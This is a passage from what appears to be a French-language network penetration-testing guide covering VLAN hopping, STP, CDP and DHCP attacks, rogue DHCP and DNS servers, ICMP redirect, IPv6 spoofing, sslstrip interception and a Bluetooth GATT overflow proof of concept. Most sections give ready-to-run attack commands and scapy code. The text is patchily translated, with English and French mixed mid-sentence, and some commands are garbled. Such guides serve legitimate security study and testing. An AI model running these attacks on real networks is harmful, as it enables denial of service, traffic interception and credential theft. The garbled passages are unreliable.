root@kali:~# arp-scan -I eth1.250 10.121.5.0/24

</details>
```bash
# Another configuration example
modprobe 8021q
vconfig add eth1 20
ifconfig eth1.20 192.168.1.2 netmask 255.255.255.0 up

# Another configuration example
sudo vconfig add eth0 30
sudo ip link set eth0.30 up
sudo dhclient -v eth0.30

Automatic VLAN Hopper

Les attaques évoquées de Dynamic Trunking and creating virtual interfaces an discovering hosts inside sur d’autres VLANs sont effectuées automatiquement par l’outil: https://github.com/nccgroup/vlan-hopping—frogger

Double Tagging

Si un attaquant connaît la valeur de la MAC, IP and VLAN ID of the victim host, il peut essayer de double tag a frame avec le VLAN qui lui est assigné et le VLAN de la victime, puis envoyer un paquet. Comme la victim won’t be able to connect back avec l’attaquant, la best option for the attacker is communicate via UDP consiste à utiliser des protocoles capables d’effectuer des actions intéressantes (comme SNMP).

Une autre option pour l’attaquant est de lancer un TCP port scan spoofing an IP controlled by the attacker and accessible by the victim (probablement via internet). Ensuite, l’attaquant pourrait sniff sur le second host qu’il possède si celui-ci reçoit des paquets de la victime.

Pour réaliser cette attaque vous pouvez utiliser scapy: pip install scapy

from scapy.all import *
# Double tagging with ICMP packet (the response from the victim isn't double tagged so it will never reach the attacker)
packet = Ether()/Dot1Q(vlan=1)/Dot1Q(vlan=20)/IP(dst='192.168.1.10')/ICMP()
sendp(packet)

Lateral VLAN Segmentation Bypass

Si vous avez accès à un switch auquel vous êtes directement connecté, vous pouvez bypass VLAN segmentation au sein du réseau. Il suffit de mettre le port en mode trunk (également appelé trunk), de créer des interfaces virtuelles avec les IDs des VLAN cibles et de configurer une adresse IP. Vous pouvez tenter d’obtenir l’adresse dynamiquement (DHCP) ou la configurer statiquement. Cela dépend du cas.

Lateral VLAN Segmentation Bypass

Layer 3 Private VLAN Bypass

Dans certains environnements, tels que les réseaux wireless pour invités, les paramètres de port isolation (également appelés private VLAN) sont mis en place pour empêcher les clients connectés à un wireless access point de communiquer directement entre eux. Cependant, une technique a été identifiée qui peut contourner ces mesures d’isolation. Cette technique exploite soit l’absence d’ACL réseau, soit leur mauvaise configuration, permettant aux paquets IP d’être routés via un router pour atteindre un autre client sur le même réseau.

L’attaque s’exécute en créant un paquet qui transporte l’adresse IP du client de destination mais avec l’adresse MAC du router. Cela entraîne le router à transférer par erreur le paquet vers le client cible. Cette approche est similaire à celle utilisée dans Double Tagging Attacks, où la capacité à contrôler un host accessible à la victime est utilisée pour exploiter la faille.

Étapes clés de l’attaque :

1. Création d’un paquet : Un paquet est spécialement conçu pour inclure l’adresse IP du client cible mais avec l’adresse MAC du router.
2. Exploitation du comportement du router : Le paquet conçu est envoyé au router qui, en raison de la configuration, redirige le paquet vers le client cible, contournant l’isolation fournie par les paramètres private VLAN.

VTP Attacks

VTP (VLAN Trunking Protocol) centralise la gestion des VLAN. Il utilise des numéros de revision pour maintenir l’intégrité de la base de données VLAN ; toute modification incrémente ce numéro. Les switches adoptent la configuration avec le numéro de revision le plus élevé, mettant à jour leur propre base de données VLAN.

VTP Domain Roles

• VTP Server: Gère les VLAN — crée, supprime, modifie. Il diffuse des annonces VTP aux membres du domaine.
• VTP Client: Reçoit les annonces VTP pour synchroniser sa base de données VLAN. Ce rôle est limité et n’autorise pas les modifications locales de configuration VLAN.
• VTP Transparent: Ne participe pas aux mises à jour VTP mais transmet les annonces VTP. Non affecté par les attaques VTP, il maintient un numéro de revision constant égal à zéro.

VTP Advertisement Types

• Summary Advertisement: Diffusée par le VTP Server toutes les 300 secondes, contenant les informations essentielles du domaine.
• Subset Advertisement: Envoyée suite à des modifications de configuration VLAN.
• Advertisement Request: Émise par un VTP client pour demander une Summary Advertisement, typiquement en réponse à la détection d’un numéro de revision de configuration plus élevé.

Les vulnérabilités VTP sont exploitables exclusivement via les trunk ports puisque les annonces VTP circulent uniquement à travers eux. Après une attaque DTP, les scénarios peuvent évoluer vers VTP. Des outils comme Yersinia peuvent faciliter des attaques VTP, visant à effacer la base de données VLAN et perturber ainsi le réseau.

Note : Cette discussion porte sur VTP version 1 (VTPv1).

yersinia -G # Launch Yersinia in graphical mode

En mode graphique de Yersinia, choisissez l’option deleting all VTP vlans pour purger la base de données VLAN.

Attaques STP

Si vous ne pouvez pas capturer de trames BPDU sur vos interfaces, il est peu probable que vous réussissiez une attaque STP.

STP BPDU DoS

L’envoi d’un grand nombre de BPDUs TCP (Topology Change Notification) ou Conf (les BPDUs envoyées lors de la création de la topologie) surcharge les switches et les fait cesser de fonctionner correctement.

yersinia stp -attack 2
yersinia stp -attack 3
#Use -M to disable MAC spoofing

STP TCP Attack

Lorsqu’un TCP est envoyé, la CAM table des switches sera supprimée au bout de 15s. Ensuite, si vous envoyez continuellement ce type de packets, la CAM table sera réinitialisée en continu (ou toutes les 15segs) et lorsqu’elle est réinitialisée, le switch se comporte comme un hub

yersinia stp -attack 1 #Will send 1 TCP packet and the switch should restore the CAM in 15 seconds
yersinia stp -attack 0 #Will send 1 CONF packet, nothing else will happen

STP Root Attack

L’attaquant simule le comportement d’un switch pour devenir le STP root du réseau. Ensuite, davantage de données transiteront par l’attaquant. C’est intéressant quand vous êtes connecté à deux switches différents.
Ceci se fait en envoyant des paquets BPDUs CONF indiquant que la valeur priority est inférieure à la priorité réelle du root switch.

yersinia stp -attack 4 #Behaves like the root switch
yersinia stp -attack 5 #This will make the device behaves as a switch but will not be root

Si l’attaquant est connecté à 2 switches il peut être la racine du nouvel arbre et tout le trafic entre ces switches passera par lui (une MITM attack sera effectuée).

yersinia stp -attack 6 #This will cause a DoS as the layer 2 packets wont be forwarded. You can use Ettercap to forward those packets "Sniff" --> "Bridged sniffing"
ettercap -T -i eth1 -B eth2 -q #Set a bridge between 2 interfaces to forwardpackages

Attaques CDP

CISCO Discovery Protocol (CDP) est essentiel pour la communication entre les appareils CISCO, leur permettant de s’identifier mutuellement et de partager des détails de configuration.

Collecte de données passive

CDP est configuré pour diffuser des informations sur tous les ports, ce qui peut entraîner un risque de sécurité. Un attaquant, en se connectant à un port de switch, peut déployer des sniffers réseau comme Wireshark, tcpdump, ou Yersinia. Cette action peut révéler des données sensibles sur le périphérique réseau, notamment son modèle et la version de Cisco IOS qu’il exécute. L’attaquant pourra alors cibler des vulnérabilités spécifiques à la version de Cisco IOS identifiée.

Induire une inondation de la table CDP

Une approche plus agressive consiste à lancer une attaque de Denial of Service (DoS) en saturant la mémoire du switch, en se faisant passer pour des appareils CISCO légitimes. Ci‑dessous la séquence de commandes pour initier une telle attaque en utilisant Yersinia, un outil réseau conçu pour les tests :

sudo yersinia cdp -attack 1 # Initiates a DoS attack by simulating fake CISCO devices
# Alternatively, for a GUI approach:
sudo yersinia -G

Lors de cette attaque, le CPU du switch et la table des voisins CDP sont fortement sollicités, entraînant ce que l’on appelle souvent « paralysie du réseau » en raison de la consommation excessive de ressources.

CDP Impersonation Attack

sudo yersinia cdp -attack 2 #Simulate a new CISCO device
sudo yersinia cdp -attack 0 #Send a CDP packet

Vous pouvez aussi utiliser scapy. Veillez à l’installer avec le package scapy/contrib.

Attaques VoIP et l’outil VoIP Hopper

Les téléphones VoIP, de plus en plus intégrés aux dispositifs IoT, offrent des fonctionnalités comme le déverrouillage de portes ou le contrôle de thermostats via des numéros de téléphone spéciaux. Cependant, cette intégration peut présenter des risques de sécurité.

L’outil voiphopper est conçu pour émuler un téléphone VoIP dans divers environnements (Cisco, Avaya, Nortel, Alcatel-Lucent). Il découvre l’ID VLAN du réseau vocal en utilisant des protocoles comme CDP, DHCP, LLDP-MED et 802.1Q ARP.

VoIP Hopper propose trois modes pour le Cisco Discovery Protocol (CDP) :

1. Sniff Mode (-c 0) : Analyse les paquets réseau pour identifier l’ID VLAN.
2. Spoof Mode (-c 1) : Génère des paquets personnalisés imitant ceux d’un véritable appareil VoIP.
3. Spoof with Pre-made Packet Mode (-c 2) : Envoie des paquets identiques à ceux d’un modèle de téléphone IP Cisco spécifique.

Le mode préféré pour la rapidité est le troisième. Il nécessite de spécifier :

• L’interface réseau de l’attaquant (-i parameter).
• Le nom de l’appareil VoIP à émuler (-E parameter), en respectant le format de nommage Cisco (par ex. SEP suivi d’une adresse MAC).

En environnement d’entreprise, pour imiter un appareil VoIP existant, on peut :

• Inspecter l’étiquette MAC sur le téléphone.
• Parcourir les paramètres d’affichage du téléphone pour voir les informations du modèle.
• Connecter l’appareil VoIP à un laptop et observer les requêtes CDP avec Wireshark.

Un exemple de commande pour exécuter l’outil en troisième mode serait :

voiphopper -i eth1 -E 'SEP001EEEEEEEEE ' -c 2

DHCP Attacks

Enumeration

nmap --script broadcast-dhcp-discover
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-16 05:30 EDT
WARNING: No targets were specified, so 0 hosts scanned.
Pre-scan script results:
| broadcast-dhcp-discover:
|   Response 1 of 1:
|     IP Offered: 192.168.1.250
|     DHCP Message Type: DHCPOFFER
|     Server Identifier: 192.168.1.1
|     IP Address Lease Time: 1m00s
|     Subnet Mask: 255.255.255.0
|     Router: 192.168.1.1
|     Domain Name Server: 192.168.1.1
|_    Domain Name: mynet
Nmap done: 0 IP addresses (0 hosts up) scanned in 5.27 seconds

DoS

Deux types de DoS peuvent être effectués contre des serveurs DHCP. Le premier consiste à simuler suffisamment d’hôtes factices pour utiliser toutes les adresses IP possibles.
Cette attaque ne fonctionnera que si vous pouvez voir les réponses du serveur DHCP et compléter le protocole (Discover (Comp) –> Offer (server) –> Request (Comp) –> ACK (server)). Par exemple, cela n’est pas possible dans les réseaux Wifi.

Une autre façon d’effectuer un DoS DHCP est d’envoyer un paquet DHCP-RELEASE en utilisant comme adresse source chaque IP possible. Ensuite, le serveur pensera que tout le monde a fini d’utiliser l’IP.

yersinia dhcp -attack 1
yersinia dhcp -attack 3 #More parameters are needed

Une façon plus automatisée de faire cela est d’utiliser l’outil DHCPing

Vous pouvez utiliser les attaques DoS mentionnées pour forcer les clients à obtenir de nouveaux baux au sein de l’environnement, et épuiser les serveurs légitimes afin qu’ils deviennent non réactifs. Ainsi, lorsque les légitimes tentent de se reconnecter, vous pouvez fournir des valeurs malveillantes mentionnées dans l’attaque suivante.

Définir des valeurs malveillantes

Un serveur DHCP malveillant peut être configuré en utilisant le script DHCP situé à /usr/share/responder/DHCP.py. Ceci est utile pour des attaques réseau, comme la capture du trafic HTTP et des identifiants, en redirigeant le trafic vers un serveur malveillant. Cependant, configurer une passerelle malveillante est moins efficace car cela ne permet de capturer que le trafic sortant du client, en omettant les réponses de la passerelle réelle. Il est préférable de déployer un serveur DNS ou WPAD malveillant pour une attaque plus efficace.

Below are the command options for configuring the rogue DHCP server:

• Our IP Address (Gateway Advertisement): Use -i 10.0.0.100 to advertise your machine’s IP as the gateway.
• Local DNS Domain Name: Optionally, use -d example.org to set a local DNS domain name.
• Original Router/Gateway IP: Use -r 10.0.0.1 to specify the IP address of the legitimate router or gateway.
• Primary DNS Server IP: Use -p 10.0.0.100 to set the IP address of the rogue DNS server you control.
• Secondary DNS Server IP: Optionally, use -s 10.0.0.1 to set a secondary DNS server IP.
• Netmask of Local Network: Use -n 255.255.255.0 to define the netmask for the local network.
• Interface for DHCP Traffic: Use -I eth1 to listen for DHCP traffic on a specific network interface.
• WPAD Configuration Address: Use -w “http://10.0.0.100/wpad.dat” to set the address for WPAD configuration, assisting in web traffic interception.
• Spoof Default Gateway IP: Include -S to spoof the default gateway IP address.
• Respond to All DHCP Requests: Include -R to make the server respond to all DHCP requests, but be aware that this is noisy and can be detected.

En utilisant correctement ces options, un serveur DHCP malveillant peut être mis en place pour intercepter efficacement le trafic réseau.

# Example to start a rogue DHCP server with specified options
!python /usr/share/responder/DHCP.py -i 10.0.0.100 -d example.org -r 10.0.0.1 -p 10.0.0.100 -s 10.0.0.1 -n 255.255.255.0 -I eth1 -w "http://10.0.0.100/wpad.dat" -S -R

EAP Attacks

Voici quelques tactiques d’attaque qui peuvent être utilisées contre les implémentations 802.1X :

• Brute-force actif de mots de passe via EAP
• Attaquer le serveur RADIUS avec du contenu EAP malformé **(exploits)
• Capture de messages EAP et craquage hors ligne de mots de passe (EAP-MD5 et PEAP)
• Forcer l’authentification EAP-MD5 pour contourner la validation du certificat TLS
• Injection de trafic réseau malveillant lors de l’authentification en utilisant un hub ou similaire

Si l’attaquant se trouve entre la victime et le serveur d’authentification, il pourrait tenter de dégrader (si nécessaire) le protocole d’authentification vers EAP-MD5 et capturer la tentative d’authentification. Ensuite, il pourrait la brute-force en utilisant :

eapmd5pass –r pcap.dump –w /usr/share/wordlist/sqlmap.txt

FHRP (GLBP & HSRP) Attacks

FHRP (First Hop Redundancy Protocol) est une classe de protocoles réseau conçue pour créer un système de routage redondant actif. Avec FHRP, des routeurs physiques peuvent être combinés en un seul dispositif logique, ce qui augmente la tolérance aux pannes et aide à répartir la charge.

Les ingénieurs de Cisco Systems ont développé deux protocoles FHRP, GLBP et HSRP.

GLBP & HSRP Attacks

RIP

On connaît trois versions du Routing Information Protocol (RIP) : RIP, RIPv2 et RIPng. Les datagrammes sont envoyés aux pairs via le port 520 en utilisant UDP par RIP et RIPv2, tandis que RIPng diffuse les datagrammes sur le port UDP 521 via le multicast IPv6. Le support de l’authentification MD5 a été introduit par RIPv2. En revanche, RIPng n’intègre pas d’authentification native ; il s’appuie sur les en-têtes optionnels IPsec AH et ESP au sein d’IPv6.

• RIP and RIPv2 : La communication se fait via des datagrammes UDP sur le port 520.
• RIPng : Utilise le port UDP 521 pour diffuser des datagrammes via le multicast IPv6.

Notez que RIPv2 prend en charge l’authentification MD5 tandis que RIPng n’inclut pas d’authentification native, s’appuyant sur les en-têtes IPsec AH et ESP dans IPv6.

EIGRP Attaques

EIGRP (Enhanced Interior Gateway Routing Protocol) est un protocole de routage dynamique. C’est un protocole à vecteur de distance. S’il n’y a aucune authentification et que les interfaces passives ne sont pas configurées, un intrus peut perturber le routage EIGRP et provoquer un empoisonnement des tables de routage. De plus, le réseau EIGRP (autrement dit, le système autonome) est plat et n’est segmenté en aucune zone. Si un attaquant injecte une route, il est probable que cette route se propage dans tout le système autonome EIGRP.

Pour attaquer un système EIGRP, il faut établir un voisinage avec un routeur EIGRP légitime, ce qui ouvre de nombreuses possibilités, de la reconnaissance basique à diverses injections.

FRRouting allows you to implement a virtual router that supports BGP, OSPF, EIGRP, RIP and other protocols. All you need to do is deploy it on your attacker’s system and you can actually pretend to be a legitimate router in the routing domain.

EIGRP Attacks

Coly has capabilities for intercepting EIGRP (Enhanced Interior Gateway Routing Protocol) broadcasts. It also allows for the injection of packets, which can be utilized to alter routing configurations.

OSPF

Dans le protocole Open Shortest Path First (OSPF), l’authentification MD5 est couramment utilisée pour assurer des communications sécurisées entre routeurs. Cependant, cette mesure de sécurité peut être compromise à l’aide d’outils tels que Loki et John the Ripper. Ces outils peuvent capturer et cracker des hachages MD5, exposant la clé d’authentification. Une fois cette clé obtenue, elle peut être utilisée pour injecter de nouvelles informations de routage. Pour configurer les paramètres de route et établir la clé compromise, les onglets Injection et Connection sont utilisés, respectivement.

• Capture et craquage des hachages MD5 : Des outils tels que Loki et John the Ripper sont utilisés à cet effet.
• Configuration des paramètres de route : Ceci se fait via l’onglet Injection.
• Définition de la clé compromise : La clé est configurée dans l’onglet Connection.

Other Generic Tools & Sources

• Above: Outil pour scanner le trafic réseau et trouver des vulnérabilités
• Vous pouvez trouver plus d’informations sur les attaques réseau ici.

Spoofing

L’attaquant configure tous les paramètres réseau (GW, IP, DNS) du nouveau membre du réseau en envoyant de fausses réponses DHCP.

Ettercap
yersinia dhcp -attack 2 #More parameters are needed

ARP Spoofing

Check the previous section.

ICMPRedirect

ICMP Redirect consiste à envoyer un packet ICMP de type 1, code 5 qui indique que l’attacker est le meilleur chemin pour atteindre une IP. Ensuite, lorsque la victim veut contacter l’IP, elle enverra le packet via l’attacker.

Ettercap
icmp_redirect
hping3 [VICTIM IP ADDRESS] -C 5 -K 1 -a [VICTIM DEFAULT GW IP ADDRESS] --icmp-gw [ATTACKER IP ADDRESS] --icmp-ipdst [DST IP ADDRESS] --icmp-ipsrc [VICTIM IP ADDRESS] #Send icmp to [1] form [2], route to [3] packets sent to [4] from [5]

DNS Spoofing

L’attacker résoudra certains (ou tous) des domaines demandés par la victim.

set dns.spoof.hosts ./dns.spoof.hosts; dns.spoof on

Configurer son propre DNS avec dnsmasq

apt-get install dnsmasq
echo "addn-hosts=dnsmasq.hosts" > dnsmasq.conf
echo "127.0.0.1   domain.example.com" > dnsmasq.hosts
sudo dnsmasq -C dnsmasq.conf --no-daemon
dig @localhost domain.example.com # Test the configured DNS

Passerelles locales

Il existe souvent plusieurs routes vers les systèmes et les réseaux. Après avoir établi une liste d’adresses MAC sur le réseau local, utilisez gateway-finder.py pour identifier les hôtes qui prennent en charge le routage IPv4.

</details>


### [Spoofing LLMNR, NBT-NS, and mDNS](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)

Pour la résolution d'hôtes locale lorsque les requêtes DNS échouent, les systèmes Microsoft s'appuient sur **Link-Local Multicast Name Resolution (LLMNR)** et le **NetBIOS Name Service (NBT-NS)**. De même, les implémentations **Apple Bonjour** et **Linux zero-configuration** utilisent **Multicast DNS (mDNS)** pour découvrir les systèmes au sein d'un réseau. En raison du caractère non authentifié de ces protocoles et de leur fonctionnement sur UDP en mode broadcast, ils peuvent être exploités par des attaquants cherchant à rediriger les utilisateurs vers des services malveillants.

Vous pouvez vous faire passer pour des services recherchés par les hôtes en utilisant Responder pour envoyer de fausses réponses.\
Read here more information about [how to Impersonate services with Responder](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md).

### [Spoofing WPAD](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)

Les navigateurs utilisent couramment le **Web Proxy Auto-Discovery (WPAD)** pour acquérir automatiquement les paramètres proxy. Cela implique de récupérer les détails de configuration depuis un serveur, généralement via une URL telle que "http://wpad.example.org/wpad.dat". La découverte de ce serveur par les clients peut se faire de plusieurs manières :

- Via **DHCP**, où la découverte est facilitée par l'utilisation d'une entrée de code spéciale 252.
- Par **DNS**, qui implique la recherche d'un hostname nommé _wpad_ dans le domaine local.
- Via **Microsoft LLMNR and NBT-NS**, qui servent de mécanismes de secours lorsque les requêtes DNS échouent.

L'outil Responder exploite ce protocole en agissant comme un **malicious WPAD server**. Il utilise DHCP, DNS, LLMNR, et NBT-NS pour tromper les clients et les amener à se connecter à lui. Pour approfondir la manière dont les services peuvent être usurpés avec Responder [check this](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md).

### [Spoofing SSDP and UPnP devices](spoofing-ssdp-and-upnp-devices.md)

Vous pouvez proposer différents services sur le réseau pour tenter de **tromper un utilisateur** et le pousser à saisir des **identifiants en clair**. **More information about this attack in** [**Spoofing SSDP and UPnP Devices**](spoofing-ssdp-and-upnp-devices.md)**.**

IPv6 Neighbor Spoofing

This attack is very similar to ARP Spoofing but in the IPv6 world. You can get the victim think that the IPv6 of the GW has the MAC of the attacker.
```bash
sudo parasite6 -l eth0 # This option will respond to every requests spoofing the address that was requested
sudo fake_advertise6 -r -w 2 eth0 <Router_IPv6> #This option will send the Neighbor Advertisement packet every 2 seconds

sysctl -w net.ipv6.conf.all.forwarding=1 4
ip route add default via <ROUTER_IPv6> dev wlan0
fake_router6 wlan0 fe80::01/16

dhcp6.spoof on
dhcp6.spoof.domains <list of domains>

mitm6

apt-get install sslstrip
sslstrip -w /tmp/sslstrip.log --all - l 10000 -f -k
#iptables --flush
#iptables --flush -t nat
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
iptables -A INPUT -p tcp --destination-port 10000 -j ACCEPT

sudo nc -l -p 80
socat TCP4-LISTEN:80,fork,reuseaddr -

FILENAME=server
# Generate a public/private key pair:
openssl genrsa -out $FILENAME.key 1024
# Generate a self signed certificate:
openssl req -new -key $FILENAME.key -x509 -sha256 -days 3653 -out $FILENAME.crt
# Generate the PEM file by just appending the key and certificate files:
cat $FILENAME.key $FILENAME.crt >$FILENAME.pem

sudo socat -v -v openssl-listen:443,reuseaddr,fork,cert=$FILENAME.pem,cafile=$FILENAME.crt,verify=0 -

sudo socat -v -v openssl-listen:443,reuseaddr,fork,cert=$FILENAME.pem,cafile=$FILENAME.crt,verify=0  openssl-connect:[SERVER]:[PORT],verify=0

</details>


### Active Discovery Notes

Prenez en compte que lorsqu'un paquet UDP est envoyé à un appareil qui n'a pas le port demandé, un ICMP (Port Unreachable) est renvoyé.

### **Découverte ARP**

Les paquets ARP servent à découvrir quelles adresses IP sont utilisées à l'intérieur du réseau. Le PC doit envoyer une requête pour chaque adresse IP possible et seules celles qui sont utilisées répondront.

### **mDNS (multicast DNS)**

Bettercap envoie une requête MDNS (tous les X ms) demandant **\_services\_.dns-sd.\_udp.local**. La machine qui voit ce paquet répond généralement à cette requête. Ensuite, il ne cherche que les machines répondant à "services".

**Tools**

- Avahi-browser (--all)
- Bettercap (net.probe.mdns)
- Responder

### **NBNS (NetBios Name Server)**

Bettercap envoie des paquets broadcast vers le port 137/UDP demandant le nom "CKAAAAAAAAAAAAAAAAAAAAAAAAAAA".

### **SSDP (Simple Service Discovery Protocol)**

Bettercap envoie des paquets SSDP en broadcast à la recherche de toutes sortes de services (UDP Port 1900).

### **WSD (Web Service Discovery)**

Bettercap envoie des paquets WSD en broadcast à la recherche de services (UDP Port 3702).


## Bluetooth (L2CAP/ATT/GATT) Attaques

- Android Fluoride expose des services sur des L2CAP PSMs (e.g., SDP 0x0001, RFCOMM 0x0003, BNEP 0x000F, AVCTP 0x0017/0x001B, AVDTP 0x0019, ATT/GATT 0x001F). Les services s'enregistrent via:
```c
uint16_t L2CA_Register2(uint16_t psm, const tL2CAP_APPL_INFO& p_cb_info,
bool enable_snoop, tL2CAP_ERTM_INFO* p_ertm_info,
uint16_t my_mtu, uint16_t required_remote_mtu,
uint16_t sec_level);

acl  = ACLConnection(src_bdaddr, dst_bdaddr, auth_mode='justworks')
gatt = acl.l2cap_connect(psm=PSM_ATT, mtu=672)
gatt.send_frag(p8(GATT_READ)+p16(1234))
print(gatt.recv())

# GATT_REQ_READ_MULTI_VAR (0x20), MTU=55
acl  = ACLConnection(interface, bdaddr)
gatt = acl.l2cap_connect(psm=PSM_ATT, mtu=55)
pkt  = b'\x20'  # opcode
pkt += p16(9); pkt += p16(9); pkt += p16(9); pkt += p16(9)
gatt.send(pkt)
# On 4th insert: p_buf->len=55 (1 + 3*(16+2)), total_len=73 -> len=16-(73-55)=-2 -> ~64KB overwrite